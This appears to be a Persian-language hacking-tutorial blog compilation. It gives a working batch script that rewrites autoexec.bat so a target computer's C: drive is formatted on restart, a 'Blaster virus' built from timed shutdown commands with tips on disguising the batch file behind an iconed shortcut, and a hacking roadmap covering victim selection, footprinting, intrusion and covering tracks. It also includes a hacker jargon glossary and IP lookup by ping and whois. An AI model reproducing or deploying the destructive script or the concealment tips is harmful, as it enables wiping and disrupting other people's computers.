اینم یک برنامه دانلودر دیگر (اگه نمی دانید دانلودر چیست به پست های قبلی در بخش Downloader مراجعه کنید) .

ZIP Password: terabit.blogfa.com
Size : 176 KB
Download

Format كردن هارد ديسك با يك فايل BAT
----------------------------------------------
برنامه NotePad را باز كنيد سپس كد زير را در آن كپي و پيست كنيد:



@echo off
call attrib -r -h c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo format /autotest c:/q>nul >>c:\autoexec.bat
call attrib +r +h c:\autoexec.bat >nul
exit

حالا فايل را با پسوند bat ذخيره كنيد. مواظب ياشيد كه فايل را اجرا نكنيد چون كل اطلاعات درايو سي شما پاك مي شود!



اين فايل چه كار مي كند؟

ابتدا كل اطلاعات موجود در فايل autoexe.bat را پاك مي كنيد سپس كد 'format /autotest c:/q' را در آن قرار مي دهد وقتي هدف شما كامپيوتر را ريست و دوباره راه اندازي كند اين كد اجرا شده و درايو سي فرمت مي شود!

------
تعداد و نام پارتيشن مورد نظر را با اندکي تغيير در کد خود ميتوانيد تعيين کنيد

1- چگونه ويروس Blaster را بسازيم
2- چگونه براي BatchFile ها آيكون بسازيم
3- چگونه خودمان در Notepad ترفند كشف كنيم!!!
فكر ميكنم همه شما ويروس Blaster را بشناسيد ويروسي كه باعث Shutdown شدن كامپيوتر در 60 ثانيه ميشد... و حتي عده كثيري از شما روش ساخت آن را بدانيد ولي در پايان اين سري مقالات و جهت تكميل اين سري از مقالات لازم ميدانم نگاهي سريع به آن بيندازيم و سپس به نكات تكميلي اين سري مقالات ميپردازيم. اين ويروس را به طرق مختلفي و با دستورات گوناگوني ميتوان نوشت كه در اينجا دو روش را مورد بررسي قرار ميدهيم در ضمن لطفا اگر با اين دستورات از قبل آشنايي نداريد حتما از Copy/Paste استفاده كنيد .
روش اول/ با استفاده ازShortcut در جايي از دسكتاپ خود Right Click كنيد و در بخش New گزينه Shortcut را انتخاب كنيد و در بخش ظاهر شده يكي از دستورات زير را وارد كنيد:
shutdown -s -t xx -1
windir%system32shutdown.exe -s -t xx% -2

توضيح: بعد از اينكه Paste كرديد به جاي xx در دستورات بالا مدت زماني را بر حسب ثانيه قرار دهيد تا كامپيوتر پس از آن زمان خاموش شود. سپس Next را بزنيد و براي فايل خود يك نام برگزينيد و كار تمام است!!.
روش دوم/ به كمكNotepad نت پد را باز كنيد و باز هم يكي از دو دستور بالا را در آن Paste كنيد و حالا فايل خود را با پسوند bat يعني با نامي مثل shutdown.bat سيو كنيدفكر ميكنم تا به حال بايد متوجه شده باشيد كه bat مخفف BatchFile است. براي پادزهر درست كردن براي اين ويروس هم ميتوانيد از دستور زير استفاده كنيد:
shutdown -a
و همه مراحل قبل را انجام دهيد. اين دستور هم از هر دو راه فوق قابل اجرا است. حالا ميرسيم به نكات تكميلي در مورد مقالات اين يك هفته:
خيلي ها سوال ميكنند كه چگونه ميتوان براي BatchFile ها آيكون انتخاب كرد. بايد بگويم يكي از ساده ترين روشها كه به هيچ نرم افزار خاصي نياز ندارد اين است كه شما از BatchFile مورد نظر يك Shortcut بسازيد و براي Shortcut براحتي آيكون انتخاب كنيد و فايل اصلي را Hidden كنيد .
تا به حال هيچ به اين فكر افتاده ايد كه اگر در كامپيوتري Notepad و Wordpad و Microsoft Word نصب نشده باشد شما اين همه ترفند را كجا ميخواهيد پياده كنيد؟؟؟!!!. آيا ميدانيد هكرها معمولا در محيط متني ديگري بجز اينها اقدام به نوشن برنامه ميكنند؟؟. بله اين محيط متني به نسبت ناشناخته همان اديتور داس Dos Editor است. شما در اين اديتور ميتوانيد كد برنامه ها را ببينيد!. براي وارد شدن به اين محيط وارد داس شويد و تايپ كنيد Edit صبر كنيد!!!قبل از اينكه وارد اين محيط شويد بايد بدانيد بر خلاف محيط بي آزار نت پد محيط Dos Editor بسيار بسيار خطرناك است. هرگونه تغييري كه خواسته يا ناخواسته در متن كد ها بوجود آوريد امكان هيچگونه بازگشت ندارد اينجا از كليدي به نام Undo خبري نيست!! همچنين همه تغييرات بطور خودكار سيو ميشود و هيچگاه موقع خروج از اديتور ازشما سوال نميشود كه Do you want to save changes و همه چيز بطور خودكار ذخيره شده و اگر احيانا كد فايل هاي اصلي سيستم را دستكاري كنيد حتي System Restore و Backup هاي رجيستري هم به دادتان نخواهند رسيد... اما براي اينكه كار با اديتور آشنا شويد و خودتان ترفندي كشف كنيد مطابق زير عمل كنيد:
1- وارد داس شويد و تايپ كنيد Edit تا وارد اديتور شويد كه صفحه اي آبي رنگ است
2- از منوي بالاي صفحه File را انتخاب و روي Open كليك كنيد.
3- به اين مسير برويد:C / WINDOWS و در پنجره سمت چپ دنبال فايلي به نام explorer.scf بگرديد اگر يادتان باشد شما در مقالات قبلي فايل ديگري را نيز با پسوند scf ساخته بوديد... يادتان مي آيد؟؟آيكون Show Desktop بود.
4- متني كه در آن ميبينيد را عينا درون Notepad وارد كنيد و فايل خود را باهمان پسوند scf سيو كنيد. به اين طريق برنامه explorer.scf بر روي صفحه ظاهر ميشود.. بله شما اولين ترفند خود را خودتان ساختيد!!! به اين وسيله شما ميتوانيد خودتان در Notepad ترفند كشف كنيد!!!! من هم به همين طريق اين ترفندها را براي شما مي نوشتم.

در آخر در پاسخ به كساني كه اعتراض كرده بودند كه چرا من اصول ويروس نويسي را اينقدر واضح مي نويسم بايد بگويم كه قصد من فقط اين بود كه تصوير مخوفي كه در ذهن ما از هكر بوجود آمده را كمي اصلاح كنم و شما هم ويروسي بنويسيد و ببينيد كه هكر بودن آنقدرها هم كه فكر ميكرديدعجيب و غريب نيست و خلاصه منظورم اصلا اين نبود كه شما از فردا راه بيفتيد و براي دوست و آشنا ويروس بنويسيد...!!.

و حرف آخر: از تمام كساني كه در اين يك هفته اين مقالات را دنبال كردند متشكرم.

خلاصه درس: مسير آينده را در اين درس مشخص می‌کنم. لغاتی از ديکشنری جارگون را می‌گم. بحث Footprinting را با پيدا کردن ip سايت شروع می‌کنيم.



◊ 133t Speak چيست؟
گاهی هکرها در هنگام نوشتن به جای تعدادی از حروف انگليسی معادل‌های قراردادی به کار می‌روند که ليست آنها را در زير می‌بينيد:
0 <= O1 <= L; I2 <= Z3 <= E4 <= A5 <= S6 <= G7 <= T8 <= B| <= L; I@ <= at (duh)$ <= S)( <= H}{ <= H/\/ <= N\/\/ <= W/\/\ <= M|> <= P; D|< <= Kph <= fz <= s


مثلا he Speaks می‌شود:
}{3 $|>34|< z
توصيه من اينه که از اين معادل‌ها تا جايی که می‌تونيد استفاده نکنيد. فقط ياد بگيريد که کم نياريد.


◊ ترسيم مسير برای آينده:
۱- اولين و مهمترين تصميم انتخاب نوع کامپيوتری است که می‌خواهيد هک کنيد ( کلاينت يا سرور )، زيرا روش‌هک کردن اين‌دو بجز در مراحل ابتدايی کاملا متفاوت است.
۲- دومين گام انتخاب يک کامپيوتر مشخص (مثلا کامپيوتری که فلان سايت را نگه می‌دارد که مثالی برای کامپيوتر سرور است و يا کامپیوتر فلان شخصی که با او چت می‌کنيد که مثالی برای کامپيوتر کلاينت است) و جمع‌آوری اطلاعات در مورد آن است. اين جمع‌آوری اطلاعات از قربانی (Victim) را Footprinting گويند. اولين مشخصه‌ای که بايد کشف شود، ip اوست. يکی ديگر از اطلاعات مهم که معمولا دنبالش هستيم، پيدا کردن نوع سيستم‌عامل و نيز برنامه‌هايی است که کامپيوتر شخص از آنها بهره می‌برد. يکی از مهمترين ( و گاه خطرناک‌ترين) کارها، تست‌کردن پورت‌های آن کامپيوتر برای ديدن اينکه کدام پورت‌ها باز و کدام‌ها بسته هستند.
۳- مرحله بعدی در واقع شروع تلاش برای نفوذ به سيستم است. اين نفوذ سطوح مختلف دارد و بالاترين آن که در کامپيوترهای سرور روی می‌دهد، حالتی است که بتوان username و password مربوط به مدير کامپيوتر (administrator) يا superuser را به‌دست آورده و از طريق اين Shell Account به نهايت نفوذ دست‌ يابيم ولی گاه به‌دلايل مختلف (مربوط به سطح علمی خود و ... ) نمی‌توان به اين سطح دست‌يافت اما به هر حال برای مرحله بعدی می‌تواند استفاده شود. اين مرحله جايی است که هنر شما يه عنوان يک هکر آغاز شده و نيز به پايان می‌رسد.
۴- اين مرحله بعد از نفوذ روی می‌دهد که در آن به يک سطحی از کنترل سيستم رسيده‌ايد. رفتار شما در اين مرحله مشخص می‌کند که چه نوع هکر هستيد(سامورايی، واکر و يا کراکر) و اينکه آيا جنبه ياد گرفتن را داشته‌ايد يا نه، همينجا مشخص خواهد شد.
۵- مرحله آخر پاک کردن ردپاست تا گير نيفتيم (البته بعضی وقتها برای کلاس گذاشتن بايد گير بيفتيم، هه هه ...). بعضی از سيستم‌ها آمار login را نگه می‌دارند که در مورد آنها اين مرحله بسيار مهم است.

خلاصه مطالب بالا به اين صورت است:
Selection -> FootPrinting -> Penetration -> [Changings] -> Cleaning



◊ خلاصه Jargon Lexicon 4.2 مشهورترين لغت‌نامه هکرها: (قسمت ۱ - قبل از A )
0
عدد صفر، مخالف حرف O انگليسی. برای تمايز اين‌دو از هم در دوره‌های مختلف از روشهای گوناگون استفاده شده است.

1TBS
.n //
"The One True Brace Style"
ر.ک. indent style

one twenty)120 reset)
.wuhn-twen'tee ree'set/ n/
عمل cycle کردن جريان (power) به يک ماشين برای ريست کردن و يا باز کردن (unjam)
م.ک. Big Red Switch, power cycle

2
infix
با توجه به تلفظ مشابه با to در انگليسی به جای آن به کار می‌رود. مثلا exe2bin به معنی تبديل exe به bin است (exe to bin)

404
.n //
HTTP error مربوط به پيدا نشدن فايل (file not found on server)

four o four)404 compliant)
adj
حالتی است که کل سايت توسط Administratorها به دليل استفاده نامناسب operatorها از آن پاک می‌شود.
ن.ک. spam, spamvertize

4.2
.for' poynt too'/ n/
اگر به تنهايی به کار رود به معنی BSD Unix release 4.2 است.

party-@
.at'par`tee/ n/
ميتينگ‌هايی که بين هکرها برگزار می‌شود که مهم‌ترين آنها همايش ساليانه Worldcon است.
م.ک. boink


◊ شروع مبحث Footprinting
گفتيم که اولين مرحله جمع‌آوری اطلاعات است که به آن FootPrinting می‌گويند. اين مبحث را با آموزش روش پيدا کردن ip شروع می‌کنيم.


◊ پيدا کردن ip يک سايت با دانستن آدرس اينترنتی آن (پيدا کردن ip سرور)
برای اين کار روشهای مختلفی هست:

۱- در (Internet Explorer (IE آدرس را تايپ کنيد و Enter را فشار دهيد. در قسمت پايين مرورگر يعنی Status Bar پس از چند لحظه برای مدت کوتاهی ip نمايش داده می‌شود و می‌توانيد آنرا يادداشت کنيد. اگر طول اين مدت بسيار کوتاه است می‌توانيد از صفحه عکس بگيريد ( با دکمه Print Screen ) و در يک نرم‌افزار گرافيکی بعد از باز کردن يک صفحه خالی به کمک Ctrl+V آنرا مشاهده کنيد. [ عجب راه احمقانه‌ای ;-)
اگر اين کار را برای www.yahoo.com انجام دهيم:



که همان شماره ip برای www.yahoo.com است.
نکته بسيار مهم اين است که به‌دليل ضريب اشتباه بسيار بالای آن هيچ‌گاه از اين روش استفاده نکنيد. نتايج ممکن است کاملا اشتباه باشد که بعدا ميگم چرا.

۲- دستور ping را در command prompt صادر کنيد:
ping domain
در اين حالت می‌توانم ip آن سايت را ملاحظه کنم. (البته کار اصلی ping يک چيز ديگست و ميشه گفت داريم ازش سوءاستفاده می‌کنيم). مثلا برای پيدا کردن ip سازين می‌نويسم:
ping sazin.com
و جواب می‌شنوم:
Pinging sazin.com [63.148.227.65] with 32 bytes of data: Reply from 63.148.227.65: bytes=32 time=821ms TTL=111Reply from 63.148.227.65: bytes=32 time=821ms TTL=111Reply from 63.148.227.65: bytes=32 time=822ms TTL=111Reply from 63.148.227.65: bytes=32 time=811ms TTL=111 Ping statistics for 63.148.227.65: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),Approximate round trip times in milli-seconds: Minimum = 811ms, Maximum = 822ms, Average = 818ms
ملاحظه می‌فرماييد که ip سازين 63.148.227.65 است.
اگر دستور ping را به‌جای sazin.com برای www.sazin.com صادر کنيد، جواب همان است. البته برای سايت‌های بزرگ جواب‌های حاصل متفاوت خواهد بود.

۳- روش بعدی و کامل‌ترين روش whois کردن به بعضی سايت‌های خاص است. بعدا اين را کامل‌تر توضيح می‌دم ولی فعلا روشش رو می‌گم. آدرس زير را در مرورگر خود تايپ کنيد:
http://www.samspade.org/t/ipwhois?a=xxxxxx
که به‌جای xxxxxx آدرس مورد نظر را تايپ کنيد. مثلا برای sazin.com يکی از دو آدرس زير را بايد تايپ کرد:
http://www.samspade.org/t/ipwhois?a=sazin.comhttp://www.samspade.org/t/ipwhois?a=www.sazin.com
چيزی که در صفحه ظاهر می‌شود به صورت زير است:
whois -h magic 63.148.227.65sazin.com resolves to 63.148.227.65 Trying whois -h whois.arin.net 63.148.227.65Qwest Communications NET-QWEST-BLKS-2 (NET-63-144-0-0-1) 63.144.0.0 - 63.151.255.255Neutron Digital Media Corp. QWST-63-148-224 (NET-63-148-224-0-1) 63.148.224.0 - 63.148.231.255 # ARIN Whois database, last updated 2002-09-04 19:05# Enter ? for additional hints on searching ARIN's Whois database.
که آدرس ip در سطر اول و دوم ذکر شده است.

اگر دو روش آخر را برای سايت بزرگ yahoo انجام دهيم، نتايج زير را می‌بينيم:
--> روش ping :
www.yahoo.com ====> 64.58.76.229
yahoo.com ====> 66.218.71.198
--> روش whois :
...و www.yahoo.com ====> 66.218.71.86
64.58.79.230 و yahoo.com ====> 66.218.71.198

نتايج حاصل گويای آن است که چرا بهتر است از whois استفاده کنيم.